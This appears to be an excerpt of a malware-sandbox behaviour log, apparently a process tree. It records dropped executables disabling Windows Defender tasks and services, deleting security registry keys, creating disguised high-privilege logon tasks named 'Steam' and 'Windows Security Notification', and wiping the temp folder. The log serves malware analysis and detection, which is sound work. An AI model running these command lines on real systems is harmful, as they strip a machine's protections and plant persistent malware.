C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:1116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:1700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:436
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:668
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:1988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:1332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe"C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 10803⤵
- Loads dropped DLL
- Program crash
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe"C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:908
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:840
-
-
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:632
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\URFSHxQetleU.bat" "4⤵PID:268
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:960
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
PID:1508
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 15124⤵
- Loads dropped DLL
- Program crash
PID:828
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit3⤵PID:1300
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*4⤵
- Deletes itself
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ASQ53bPd3e32.bat" "3⤵
- Loads dropped DLL
PID:1520 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:1968
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost4⤵
- Runs ping.exe
PID:964
-
-
C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-